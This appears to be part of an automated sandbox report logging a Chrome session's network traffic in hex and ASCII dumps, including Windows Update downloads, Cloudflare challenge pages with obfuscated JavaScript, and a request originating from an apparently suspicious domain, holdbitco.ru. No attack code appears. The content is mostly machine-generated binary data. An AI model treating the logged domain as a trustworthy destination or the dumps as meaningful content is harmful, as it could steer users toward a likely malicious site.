49 43
                                                                                                                                                                                                                                                                                                              Data Ascii: iZWwge1xuICAgICAgICAgICAgLm1hcmsge1xuICAgICAgICAgICAgICAgIGxlZnQ6IDExcHg7XG4gICAgICAgICAgICB9XG5cbiAgICAgICAgICAgIGlucHV0IHtcbiAgICAgICAgICAgICAgICBsZWZ0OiAxMXB4O1xuICAgICAgICAgICAgfVxuICAgICAgICB9XG5cbiAgICAgICAgI2NoYWxsZW5nZS1lcnJvci10ZXh0IHtcbiAgICAgIC
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1081INData Raw: 65 44 74 63 62 69 41 67 49 43 41 67 49 43 41 67 66 56 78 75 49 43 41 67 49 48 31 63 62 6e 31 63 62 6c 78 75 4c 6d 78 68 62 6d 63 74 61 57 51 67 65 31 78 75 49 43 41 67 49 43 35 7a 61 58 70 6c 4c 57 4e 76 62 58 42 68 59 33 51 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 6a 59 32 68 68 62 47 78 6c 62 6d 64 6c 4c 57 56 79 63 6d 39 79 4c 58 52 6c 65 48 51 67 65 31 78 75 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 62 47 6c 75 5a 53 31 6f 5a 57 6c 6e 61 48 51 36 49 44 45 77 63 48 67 37 58 47 34 67 49 43 41 67 49 43 41 67 49 48 31 63 62 69 41 67 49 43 42 39 58 47 35 39 58 47 35 63 62 6b 42 74 5a 57 52 70 59 53 41 6f 63 48 4a 6c 5a 6d 56 79 63 79 31 6a 62 32 78 76 63 69 31 7a 59 32 68 6c 62 57 55 36 49 47 52 68 63 6d 73 70 49 48 74 63 62 69 41 67 49 43 42
                                                                                                                                                                                                                                                                                                              Data Ascii: eDtcbiAgICAgICAgfVxuICAgIH1cbn1cblxuLmxhbmctaWQge1xuICAgIC5zaXplLWNvbXBhY3Qge1xuICAgICAgICAjY2hhbGxlbmdlLWVycm9yLXRleHQge1xuICAgICAgICAgICAgbGluZS1oZWlnaHQ6IDEwcHg7XG4gICAgICAgIH1cbiAgICB9XG59XG5cbkBtZWRpYSAocHJlZmVycy1jb2xvci1zY2hlbWU6IGRhcmspIHtcbiAgICB
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1085INData Raw: 43 41 67 49 43 35 7a 64 57 4e 6a 5a 58 4e 7a 4c 57 4e 70 63 6d 4e 73 5a 53 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 7a 64 48 4a 76 61 32 55 36 49 43 52 7a 64 57 4e 6a 5a 58 4e 7a 4c 57 4e 76 62 47 39 79 4c 54 45 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6d 61 57 78 73 4f 69 41 6b 63 33 56 6a 59 32 56 7a 63 79 31 6a 62 32 78 76 63 69 30 78 4f 31 78 75 49 43 41 67 49 43 41 67 49 43 42 39 58 47 35 63 62 69 41 67 49 43 41 67 49 43 41 67 49 32 5a 79 4c 57 68 6c 62 48 42 6c 63 69 31 73 61 57 35 72 4c 46 78 75 49 43 41 67 49 43 41 67 49 43 41 6a 5a 6e 49 74 61 47 56 73 63 47 56 79 4c 57 78 76 62 33 41 74 62 47 6c 75 61 79 42 37 58 47 34 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 4a 47 4e 76
                                                                                                                                                                                                                                                                                                              Data Ascii: CAgIC5zdWNjZXNzLWNpcmNsZSB7XG4gICAgICAgICAgICBzdHJva2U6ICRzdWNjZXNzLWNvbG9yLTE7XG4gICAgICAgICAgICBmaWxsOiAkc3VjY2Vzcy1jb2xvci0xO1xuICAgICAgICB9XG5cbiAgICAgICAgI2ZyLWhlbHBlci1saW5rLFxuICAgICAgICAjZnItaGVscGVyLWxvb3AtbGluayB7XG4gICAgICAgICAgICBjb2xvcjogJGNv
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1089INData Raw: 20 20 20 20 20 7d 28 29 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 61 70 69 2f 76 31 3f 72 61 79 3d 38 31 62 62 64 34 30 65 31 65 63 61 35 39 66 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 74 68 65 6d 65 2d 61 75 74 6f 20 73 69 7a 65 2d 6e 6f 72 6d 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 22 3e 50 6c 65
                                                                                                                                                                                                                                                                                                              Data Ascii: }()); </script> <script src="/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=81bbd40e1eca59f1"></script></head><body class="theme-auto size-normal"><div class="main-wrapper"> <noscript> <h1 style="color:#bd2426;">Ple
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1090INData Raw: 32 30 35 32 0d 0a 31 3d 22 32 34 2e 35 34 36 22 20 79 32 3d 22 32 39 2e 35 34 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 72 6f 74 61 74 65 28 31 33 35 20 32 34 2e 35 34 35 39 20 32 34 2e 35 34 36 29 22 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 3c 2f 6c 69 6e 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 78 31 3d 22 31 35 22 20 78 32 3d 22 31 35 22 20 79 31 3d 22 32 38 2e 35 22 20 79 32 3d 22 33 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 72 6f 74 61 74 65 28 31 38 30 20 31 35 20 32 38 2e 35 29 22 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 3c 2f 6c 69 6e 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 78 31 3d 22 35 2e 34 35 34 31 22 20 78 32 3d 22 35 2e 34 35 34 31 22 20 79 31 3d 22 32
                                                                                                                                                                                                                                                                                                              Data Ascii: 20521="24.546" y2="29.546" transform="rotate(135 24.5459 24.546)" class="circle"></line> <line x1="15" x2="15" y1="28.5" y2="33.5" transform="rotate(180 15 28.5)" class="circle"></line> <line x1="5.4541" x2="5.4541" y1="2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1094INData Raw: 39 35 39 20 31 31 2e 37 31 38 36 43 36 39 2e 35 33 33 36 20 31 31 2e 37 31 39 39 20 36 39 2e 35 37 30 35 20 31 31 2e 37 33 20 36 39 2e 36 30 33 37 20 31 31 2e 37 34 38 33 43 36 39 2e 36 33 36 39 20 31 31 2e 37 36 36 36 20 36 39 2e 36 36 35 34 20 31 31 2e 37 39 32 35 20 36 39 2e 36 38 37 20 31 31 2e 38 32 33 39 43 36 39 2e 37 30 39 32 20 31 31 2e 38 35 37 36 20 36 39 2e 37 32 33 34 20 31 31 2e 38 39 36 20 36 39 2e 37 32 38 33 20 31 31 2e 39 33 36 33 43 36 39 2e 37 33 33 32 20 31 31 2e 39 37 36 35 20 36 39 2e 37 32 38 38 20 31 32 2e 30 31 37 33 20 36 39 2e 37 31 35 33 20 31 32 2e 30 35 35 35 43 36 39 2e 36 39 33 37 20 31 32 2e 31 31 38 20 36 39 2e 36 35 34 36 20 31 32 2e 31 37 32 37 20 36 39 2e 36 30 32 38 20 31 32 2e 32 31 32 39 43 36 39 2e 35 35 30 39 20
                                                                                                                                                                                                                                                                                                              Data Ascii: 959 11.7186C69.5336 11.7199 69.5705 11.73 69.6037 11.7483C69.6369 11.7666 69.6654 11.7925 69.687 11.8239C69.7092 11.8576 69.7234 11.896 69.7283 11.9363C69.7332 11.9765 69.7288 12.0173 69.7153 12.0555C69.6937 12.118 69.6546 12.1727 69.6028 12.2129C69.5509
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1098INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              8192.168.2.164973513.85.23.86443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC184OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S4ayF1XodpULRLK&MD=x2yT1Dku HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC185INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                              MS-CorrelationId: b4c3a421-574a-43a4-94fc-88e75118a783
                                                                                                                                                                                                                                                                                                              MS-RequestId: ee2141ee-ebc5-49c1-98b2-b6b4b75a4c00
                                                                                                                                                                                                                                                                                                              MS-CV: wkzlXKh3BkC5UzUJ.0
                                                                                                                                                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC185INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC201INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              80192.168.2.1649807104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1098OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=81bbd40e1eca59f1 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              81192.168.2.164980835.190.80.1443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1099OUTOPTIONS /report/v3?s=J8I70%2FF5if0I3ZOJT1VpkJ0%2F3RsDViHHj4MmpLieQnShCDKxFFtOYJ2OYysBnxanROVdwMtmFcorJfEl3hn0salg57S0ibXuEy27HdNizI4h0aVL%2BJy7zD6NvbQ%2FrxRTc%2FcyumgVp%2Bh%2BnSvu HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              82192.168.2.1649809104.17.3.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1099OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              83104.17.3.184443192.168.2.1649807C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1100INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:41 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd4111db27ffa-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1100INData Raw: 37 65 36 33 0d 0a 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 37 2c 66 79 2c 66 7a 2c 66 47 2c 66 4b 2c 66 4c 2c 66 4d 2c 66 51 2c 66 55 2c 66 56 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 6b 2c 68 4a 2c 68 4e 2c 68 57 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: 7e63window._cf_chl_opt.uaO=false;~function(i7,fy,fz,fG,fK,fL,fM,fQ,fU,fV,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hk,hJ,hN,hW,
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1101INData Raw: 3b 21 66 5b 69 4c 28 33 36 32 29 5d 28 69 73 4e 61 4e 2c 6b 3d 63 5b 69 4c 28 31 33 38 37 29 5d 28 2b 2b 67 29 29 3b 69 5b 69 4c 28 31 34 35 35 29 5d 28 53 74 72 69 6e 67 5b 69 4c 28 31 37 31 37 29 5d 28 66 5b 69 4c 28 31 36 39 31 29 5d 28 66 5b 69 4c 28 31 32 38 34 29 5d 28 66 5b 69 4c 28 31 36 32 31 29 5d 28 6b 2c 32 35 35 29 2c 68 29 2d 67 25 36 35 35 33 35 2c 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 4c 28 38 36 35 29 5d 28 27 27 29 7d 2c 66 4c 3d 7b 7d 2c 66 4c 5b 69 37 28 31 32 39 29 5d 3d 27 6f 27 2c 66 4c 5b 69 37 28 31 35 32 36 29 5d 3d 27 73 27 2c 66 4c 5b 69 37 28 39 36 37 29 5d 3d 27 75 27 2c 66 4c 5b 69 37 28 31 32 31 31 29 5d 3d 27 7a 27 2c 66 4c 5b 69 37 28 38 38 30 29 5d 3d 27 6e 27 2c 66 4c 5b 69 37 28 31 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ;!f[iL(362)](isNaN,k=c[iL(1387)](++g));i[iL(1455)](String[iL(1717)](f[iL(1691)](f[iL(1284)](f[iL(1621)](k,255),h)-g%65535,65535)%255)));return i[iL(865)]('')},fL={},fL[i7(129)]='o',fL[i7(1526)]='s',fL[i7(967)]='u',fL[i7(1211)]='z',fL[i7(880)]='n',fL[i7(1e
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1103INData Raw: 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 45 2c 46 2c 69 53 29 7b 69 53 3d 62 2c 4f 62 6a 65 63 74 5b 69 53 28 38 36 33 29 5d 5b 69 53 28 31 39 34 35 29 5d 5b 69 53 28 31 36 36 30 29 5d 28 6a 2c 46 29 7c 7c 28 6a 5b 46 5d 3d 5b 5d 29 2c 6a 5b 46 5d 5b 69 53 28 31 34 35 35 29 5d 28 45 29 7d 7d 2c 66 51 3d 4f 62 6a 65 63 74 5b 69 37 28 31 31 34 37 29 5d 2c 66 53 3d 5b 5d 2c 66 54 3d 30 3b 32 35 36 3e 66 54 3b 66 53 5b 66 54 5d 3d 53 74 72 69 6e 67 5b 69 37 28 31 37 31 37 29 5d 28 66 54 29 2c 66 54 2b 2b 29 3b 69 35 3d 28 66 55 3d 28 30 2c 65 76 61 6c 29 28 69 37 28 31 35 31 31 29 29 2c 66 56 3d 61 74 6f 62 28 69 37 28 31 34 39 36 29 29 2c 66 79 5b 69 37 28 31 36 32 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 72 79 7b 72
                                                                                                                                                                                                                                                                                                              Data Ascii: ++);return j;function s(E,F,iS){iS=b,Object[iS(863)][iS(1945)][iS(1660)](j,F)||(j[F]=[]),j[F][iS(1455)](E)}},fQ=Object[i7(1147)],fS=[],fT=0;256>fT;fS[fT]=String[i7(1717)](fT),fT++);i5=(fU=(0,eval)(i7(1511)),fV=atob(i7(1496)),fy[i7(1622)]=function(c){try{r
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1104INData Raw: 28 38 32 31 29 2b 66 79 5b 6a 44 28 31 34 30 32 29 5d 5b 6a 44 28 31 31 35 38 29 5d 2c 27 2f 27 29 2b 66 79 5b 6a 44 28 31 34 30 32 29 5d 5b 6a 44 28 31 30 37 32 29 5d 2b 27 2f 27 2c 66 79 5b 6a 44 28 31 34 30 32 29 5d 5b 6a 44 28 31 32 38 32 29 5d 29 2c 6c 3d 6e 65 77 20 66 79 5b 28 6a 44 28 31 37 31 39 29 29 5d 28 29 2c 21 6c 29 72 65 74 75 72 6e 3b 6d 3d 6a 44 28 33 33 32 29 2c 6c 5b 6a 44 28 31 37 38 39 29 5d 28 6d 2c 6b 2c 21 21 5b 5d 29 2c 6c 5b 6a 44 28 31 30 37 35 29 5d 3d 32 35 30 30 2c 6c 5b 6a 44 28 39 36 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6c 5b 6a 44 28 35 31 39 29 5d 28 69 5b 6a 44 28 31 37 38 33 29 5d 2c 69 5b 6a 44 28 34 33 39 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 6a 44 28 36 32 36 29 5d 3d 66 2c 6e 2e 63 63 3d 67 2c 6f 3d 69 35
                                                                                                                                                                                                                                                                                                              Data Ascii: (821)+fy[jD(1402)][jD(1158)],'/')+fy[jD(1402)][jD(1072)]+'/',fy[jD(1402)][jD(1282)]),l=new fy[(jD(1719))](),!l)return;m=jD(332),l[jD(1789)](m,k,!![]),l[jD(1075)]=2500,l[jD(961)]=function(){},l[jD(519)](i[jD(1783)],i[jD(439)]),n={},n[jD(626)]=f,n.cc=g,o=i5
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1105INData Raw: 27 46 50 54 42 4b 27 3a 6a 4b 28 31 35 30 37 29 2c 27 4c 70 77 67 55 27 3a 6a 4b 28 31 34 39 31 29 2c 27 71 74 6b 4c 56 27 3a 6a 4b 28 31 31 39 31 29 2c 27 43 59 50 73 65 27 3a 6a 4b 28 33 32 38 29 7d 2c 65 3d 65 7c 7c 30 2c 66 5b 6a 4b 28 31 37 37 35 29 5d 28 65 2c 35 29 29 7b 69 66 28 66 5b 6a 4b 28 33 34 30 29 5d 28 6a 4b 28 34 38 34 29 2c 6a 4b 28 34 38 34 29 29 29 72 65 74 75 72 6e 20 76 6f 69 64 20 66 79 5b 6a 4b 28 34 34 33 29 5d 28 29 3b 65 6c 73 65 20 65 5b 6a 4b 28 31 34 35 35 29 5d 28 66 5b 6a 4b 28 34 37 33 29 5d 5b 6a 4b 28 35 36 39 29 5d 28 29 5b 6a 4b 28 31 37 38 37 29 5d 28 27 5f 27 2c 27 2d 27 29 29 7d 69 66 28 67 3d 21 5b 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 6a 4c 29 7b 69 66 28 6a 4c 3d 6a 4b 2c 67 29 72 65 74 75 72 6e 3b 67 3d 21 21
                                                                                                                                                                                                                                                                                                              Data Ascii: 'FPTBK':jK(1507),'LpwgU':jK(1491),'qtkLV':jK(1191),'CYPse':jK(328)},e=e||0,f[jK(1775)](e,5)){if(f[jK(340)](jK(484),jK(484)))return void fy[jK(443)]();else e[jK(1455)](f[jK(473)][jK(569)]()[jK(1787)]('_','-'))}if(g=![],h=function(jL){if(jL=jK,g)return;g=!!
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:41 UTC1107INData Raw: 5b 6a 4e 28 31 36 33 35 29 5d 28 74 79 70 65 6f 66 20 77 2c 6a 4e 28 36 36 32 29 29 26 26 66 5b 6a 4e 28 37 35 34 29 5d 28 77 2c 64 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 30 27 3a 78 3d 68 70 28 6f 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 2c 6b 3d 69 35 5b 6a 4b 28 37 36 34 29 5d 28 4a 53 4f 4e 5b 6a 4b 28 31 31 33 34 29 5d 28 64 29 29 5b 6a 4b 28 31 37 38 37 29 5d 28 27 2b 27 2c 66 5b 6a 4b 28 31 36 34 32 29 5d 29 2c 69 5b 6a 4b 28 31 36 35 35 29 5d 28 66 5b 6a 4b 28 33 30 38 29 5d 28 27 76 5f 27 2b 66 79 5b 6a 4b 28 31 34 30 32 29 5d 5b 6a 4b 28 31 31 35 38 29 5d 2b 27 3d 27 2c 6b 29 29 7d 2c 67 6f 3d 7b 7d 2c 67 6f 5b 69 37 28 35 34 34 29 5d 3d 69 37 28 37 32 32 29 2c 67 6f 5b 69 37 28 36 35 37 29 5d 3d 69 37 28 38 39 34 29
